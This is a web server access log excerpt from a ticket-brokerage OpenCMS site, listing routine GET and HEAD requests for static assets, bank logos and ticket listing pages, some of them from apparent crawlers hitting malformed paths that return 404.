95.202.79.248 - - [28/Jun/2024:03:40:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/sv/ask-form.html HTTP/1.1" 200 2950
95.202.79.248 - - [28/Jun/2024:03:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
47.128.54.183 - - [28/Jun/2024:03:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.54.183 - - [28/Jun/2024:03:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.54.183 - - [28/Jun/2024:03:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.54.183 - - [28/Jun/2024:03:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.54.183 - - [28/Jun/2024:03:40:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.54.183 - - [28/Jun/2024:03:40:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.55.193 - - [28/Jun/2024:03:40:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.55.193 - - [28/Jun/2024:03:40:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.54.183 - - [28/Jun/2024:03:40:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.55.193 - - [28/Jun/2024:03:40:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.55.193 - - [28/Jun/2024:03:40:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.55.193 - - [28/Jun/2024:03:40:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.55.193 - - [28/Jun/2024:03:40:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.55.193 - - [28/Jun/2024:03:40:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
5.9.55.228 - - [28/Jun/2024:03:40:35 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=9FB7859D-DDE8-10E7-3804-37A1874573F9 HTTP/1.1" 200 86720
3.224.220.101 - - [28/Jun/2024:03:40:35 +0200] "GET /ticket2/opencms/it/buy/?catid=8E4972FC-6E2C-77A4-BB9D-D67BD270A641&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77072
66.249.69.129 - - [28/Jun/2024:03:40:36 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=E9DB3A42-82BF-9B65-3ED4-EE5A32871388 HTTP/1.1" 200 107441
193.70.81.110 - - [28/Jun/2024:03:40:37 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=641D001A-C01A-D7A7-205C-82BE3A937088&sortorder=desc&column=row HTTP/1.1" 404 -
66.249.75.168 - - [28/Jun/2024:03:40:38 +0200] "GET /ticket2/opencms/de/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075 HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:40:38 +0200] "GET /ticket2/opencms/it/buy/?catid=1DB7F66B-473B-B427-F752-358FEEFE8EC0&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77083
193.70.81.110 - - [28/Jun/2024:03:40:41 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=642E9578-D653-AE72-0BA4-FF639C3984BF&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:40:42 +0200] "GET /ticket2/opencms/it/buy/?catid=FCA7FF95-260A-464B-B6FF-A820FCE7DFEF&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77081
193.70.81.110 - - [28/Jun/2024:03:40:45 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=672A3C6F-40D0-0A91-661F-3F64D5642035&sortorder=asc&column=price HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:40:46 +0200] "GET /ticket2/opencms/it/buy/?catid=26594C33-56CE-F529-FAF3-61AB33F74A3B&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77079
65.108.227.178 - - [28/Jun/2024:03:40:47 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=FAA7165D-A922-1603-AEA2-82846AE794CA&sortorder=asc&column=row HTTP/1.1" 404 -
193.70.81.110 - - [28/Jun/2024:03:40:49 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=672A3C6F-40D0-0A91-661F-3F64D5642035&sortorder=asc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:40:50 +0200] "GET /ticket2/opencms/it/buy/?catid=CB847559-7ECA-CC50-D7D2-064AF0C06FB1&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77081
5.9.55.228 - - [28/Jun/2024:03:40:52 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A0181B24-3F5A-DFFE-D682-01608EA56A2F HTTP/1.1" 200 86936
3.224.220.101 - - [28/Jun/2024:03:40:54 +0200] "GET /ticket2/opencms/it/buy/?catid=AD8E612F-0F0B-03C9-5236-E4F8B6523945&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77081
193.70.81.110 - - [28/Jun/2024:03:40:55 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=68573C32-5F8D-AC1E-AD14-28E520160FCD&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.58.9 - - [28/Jun/2024:03:40:56 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/serie_a/ HTTP/1.1" 200 78932
47.128.58.9 - - [28/Jun/2024:03:40:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.58.9 - - [28/Jun/2024:03:40:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/sv/serie_a_sv.png HTTP/1.1" 200 13270
3.224.220.101 - - [28/Jun/2024:03:40:58 +0200] "GET /ticket2/opencms/it/buy/?catid=412DBCF4-025D-8ABC-7A40-D7C760E055FF&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77083
47.128.58.9 - - [28/Jun/2024:03:40:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.58.9 - - [28/Jun/2024:03:40:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.58.9 - - [28/Jun/2024:03:40:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.58.9 - - [28/Jun/2024:03:40:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.58.9 - - [28/Jun/2024:03:40:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.58.9 - - [28/Jun/2024:03:40:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
216.245.221.83 - - [28/Jun/2024:03:40:58 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [28/Jun/2024:03:41:01 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
193.70.81.110 - - [28/Jun/2024:03:41:02 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=6A066321-8561-A11B-AAA6-D4F9A8D6BE39&sortorder=asc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [28/Jun/2024:03:41:02 +0200] "GET /ticket2/opencms/it/buy/?catid=A05A53F7-423D-23BE-575E-EA7B67DE22D9&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77081
23.22.35.162 - - [28/Jun/2024:03:41:06 +0200] "GET /ticket2/opencms/it/buy/?catid=53E7B32E-5CAA-6CE7-D6AA-FFC41D70EE01&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77081
5.9.55.228 - - [28/Jun/2024:03:41:09 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A098D6B2-660B-4A91-CD88-E211CF0A7F9F HTTP/1.1" 200 85188
3.224.220.101 - - [28/Jun/2024:03:41:10 +0200] "GET /ticket2/opencms/it/buy/?catid=5ED34547-492C-90DA-709D-448345844685&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77081
193.70.81.110 - - [28/Jun/2024:03:41:12 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=6A9CAEB5-A533-3B6D-F998-D9CD07CC58D3&sortorder=asc&column=section HTTP/1.1" 404 -
23.22.35.162 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/it/buy/?catid=3A56B1C2-6FFB-C8D1-B229-B3914D5FF8DF&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 77084
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/sv/search.html?searchQuery=Barcelona+&submit= HTTP/1.1" 200 93407
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/sv/ask-form.html HTTP/1.1" 200 2950
95.202.79.248 - - [28/Jun/2024:03:41:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
193.70.81.110 - - [28/Jun/2024:03:41:18 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=6BB562BA-2C6F-8AE1-6BE1-30FFE188507E HTTP/1.1" 404 -
52.70.240.171 - - [28/Jun/2024:03:41:18 +0200] "GET /ticket2/opencms/it/buy/?catid=8C381435-A1E8-94AF-2C58-D133FCA44A31&comcatid=66708183-7480-3365-06BF-DBF60280AB45 HTTP/1.1" 200 75432
47.128.31.177 - - [28/Jun/2024:03:41:20 +0200] "GET /ticket2/opencms/no/buy/?catid=7EF04817-972D-18B1-F941-DE800D088075&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=0E2FBBAA-9DFD-37E8-1D28-E85F522880D0&page=7 HTTP/1.1" 200 83086
47.128.31.177 - - [28/Jun/2024:03:41:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
3.224.220.101 - - [28/Jun/2024:03:41:22 +0200] "GET /ticket2/opencms/it/buy/?catid=30D5812D-0858-4843-8F45-C38AE504153C&comcatid=66708183-7480-3365-06BF-DBF60280AB45 HTTP/1.1" 200 75428
65.108.227.178 - - [28/Jun/2024:03:41:22 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=FAA7165D-A922-1603-AEA2-82846AE794CA&sortorder=asc&column=section HTTP/1.1" 404 -
193.70.81.110 - - [28/Jun/2024:03:41:22 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=6BF862F8-A441-DB7D-094A-EE5943FAD633&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.31.177 - - [28/Jun/2024:03:41:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.31.177 - - [28/Jun/2024:03:41:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
5.9.55.228 - - [28/Jun/2024:03:41:25 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A0A75B5B-3D51-D743-BA1B-F39519FFC67E HTTP/1.1" 200 88001
47.128.31.177 - - [28/Jun/2024:03:41:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
52.70.240.171 - - [28/Jun/2024:03:41:26 +0200] "GET /ticket2/opencms/it/buy/?catid=05A94519-01D1-C86F-9031-84936B0B9DAE&comcatid=66708183-7480-3365-06BF-DBF60280AB45 HTTP/1.1" 200 75427
47.128.31.177 - - [28/Jun/2024:03:41:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.31.177 - - [28/Jun/2024:03:41:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.31.177 - - [28/Jun/2024:03:41:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.31.177 - - [28/Jun/2024:03:41:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
193.70.81.110 - - [28/Jun/2024:03:41:27 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=6BF862F8-A441-DB7D-094A-EE5943FAD633&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:41:30 +0200] "GET /ticket2/opencms/it/buy/?catid=7D3BEF66-5D88-3916-5B89-0E7B139E0169&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78366
193.70.81.110 - - [28/Jun/2024:03:41:32 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=6DB046DB-410B-73D4-9D8B-16FCC7635D61&sortorder=desc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [28/Jun/2024:03:41:34 +0200] "GET /ticket2/opencms/it/buy/?catid=F7FF413B-5FDF-82CF-E5BB-CD4AB6027974&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78360
193.70.81.110 - - [28/Jun/2024:03:41:37 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=6E4C3072-9568-0883-2471-D96FAB16F06F&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:41:38 +0200] "GET /ticket2/opencms/it/buy/?catid=E3105E1E-3982-291E-5523-1C1DF161E9B7&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78363
66.249.72.33 - - [28/Jun/2024:03:41:40 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=C15AE28C-73DB-6928-32A1-4EC14A77EEA7 HTTP/1.1" 200 111233
66.249.69.128 - - [28/Jun/2024:03:41:41 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=697BE447-74B7-A748-152F-A1818DA4BEC9 HTTP/1.1" 200 111858
23.22.35.162 - - [28/Jun/2024:03:41:42 +0200] "GET /ticket2/opencms/it/buy/?catid=2E79AED8-FF58-B4E8-AFB0-43E7CEBE7864&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78361
5.9.55.228 - - [28/Jun/2024:03:41:42 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A0FF03C8-8420-0877-2FE6-0C9E8902BC6D HTTP/1.1" 200 88022
193.70.81.110 - - [28/Jun/2024:03:41:42 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=6E4C3072-9568-0883-2471-D96FAB16F06F&sortorder=desc&column=section HTTP/1.1" 404 -
23.22.35.162 - - [28/Jun/2024:03:41:46 +0200] "GET /ticket2/opencms/it/buy/?catid=55D1256D-BDD9-CBA3-47A3-0A252F702555&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78367
193.70.81.110 - - [28/Jun/2024:03:41:47 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=73A3A5F2-CAB0-2E2B-1A14-CDFFCD940FAA&sortorder=desc&column=price HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:41:50 +0200] "GET /ticket2/opencms/it/buy/?catid=81B744E7-1FEE-E757-C0AB-C7AF73CDE252&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78360
193.70.81.110 - - [28/Jun/2024:03:41:52 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=73A3A5F2-CAB0-2E2B-1A14-CDFFCD940FAA&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:41:54 +0200] "GET /ticket2/opencms/it/buy/?catid=F4D223A4-C027-46DC-3DE5-726A23E30A62&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78360
47.128.97.170 - - [28/Jun/2024:03:41:54 +0200] "GET /ticket2/opencms/fi/buy/?catid=6CD184E8-C8D4-E1CC-33D0-6F47E3751240&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78396
193.70.81.110 - - [28/Jun/2024:03:41:56 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=73A3A5F2-CAB0-2E2B-1A14-CDFFCD940FAA&sortorder=desc&column=section HTTP/1.1" 404 -
47.128.97.170 - - [28/Jun/2024:03:41:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
65.108.227.178 - - [28/Jun/2024:03:41:56 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=FB7F0AD6-8707-51F1-5AF9-A7E952D9C69E&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.97.170 - - [28/Jun/2024:03:41:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.97.170 - - [28/Jun/2024:03:41:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
3.224.220.101 - - [28/Jun/2024:03:41:58 +0200] "GET /ticket2/opencms/it/buy/?catid=078F99D4-0B9E-E323-5A07-D7B70F6E8874&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78363
47.128.97.170 - - [28/Jun/2024:03:41:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.97.170 - - [28/Jun/2024:03:41:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.97.170 - - [28/Jun/2024:03:41:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.97.170 - - [28/Jun/2024:03:41:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
5.9.55.228 - - [28/Jun/2024:03:41:58 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A113B61A-B5C1-60FF-81C6-AFD814B7CD4E HTTP/1.1" 200 85191
193.70.81.110 - - [28/Jun/2024:03:42:01 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=73AA76A9-CC6C-17F3-EDBF-4AA5949DD817&sortorder=desc&column=price HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:42:02 +0200] "GET /ticket2/opencms/it/buy/?catid=757E2DFB-33DA-9B34-8402-9F06B19D8409&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78369
193.70.81.110 - - [28/Jun/2024:03:42:05 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=73AA76A9-CC6C-17F3-EDBF-4AA5949DD817&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:42:06 +0200] "GET /ticket2/opencms/it/buy/?catid=9457695E-36ED-A63E-7A88-32963954E2C7&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78368
193.70.81.110 - - [28/Jun/2024:03:42:09 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=73AA76A9-CC6C-17F3-EDBF-4AA5949DD817&sortorder=desc&column=section HTTP/1.1" 404 -
23.22.35.162 - - [28/Jun/2024:03:42:10 +0200] "GET /ticket2/opencms/it/buy/?catid=8B6802AF-1ADE-4BE1-A1F7-7671190CFB4F&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78367
5.9.55.228 - - [28/Jun/2024:03:42:13 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A18B7AA2-BC88-9685-D882-F3ACFA423D12 HTTP/1.1" 200 86784
52.70.240.171 - - [28/Jun/2024:03:42:14 +0200] "GET /ticket2/opencms/it/buy/?catid=6CD184E8-C8D4-E1CC-33D0-6F47E3751240&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78365
193.70.81.110 - - [28/Jun/2024:03:42:14 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=7584F820-CD7D-628C-D907-63A2068AD86B&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.97.230 - - [28/Jun/2024:03:42:17 +0200] "GET /ticket2/opencms/no/buy/?catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83074
3.224.220.101 - - [28/Jun/2024:03:42:18 +0200] "GET /ticket2/opencms/it/buy/?catid=1656E964-1E02-9A38-D092-65384E60B6EA&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78361
47.128.97.230 - - [28/Jun/2024:03:42:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.97.230 - - [28/Jun/2024:03:42:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
193.70.81.110 - - [28/Jun/2024:03:42:19 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=7584F820-CD7D-628C-D907-63A2068AD86B&sortorder=desc&column=section HTTP/1.1" 404 -
47.128.97.230 - - [28/Jun/2024:03:42:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.97.230 - - [28/Jun/2024:03:42:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.97.230 - - [28/Jun/2024:03:42:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.97.230 - - [28/Jun/2024:03:42:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.97.230 - - [28/Jun/2024:03:42:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
23.22.35.162 - - [28/Jun/2024:03:42:22 +0200] "GET /ticket2/opencms/it/buy/?catid=D414C6A5-7A03-3389-42A8-D7B7FE32BB37&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78374
193.70.81.110 - - [28/Jun/2024:03:42:23 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=764DF107-581D-BCA1-53D5-94329CB26BAD&sortorder=desc&column=price HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:42:26 +0200] "GET /ticket2/opencms/it/buy/?catid=F7F89B9B-6697-7881-54AE-4C39276BF1B8&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78365
193.70.81.110 - - [28/Jun/2024:03:42:29 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=788963AF-9A89-75A3-2D87-6B3C9C1E0D23 HTTP/1.1" 404 -
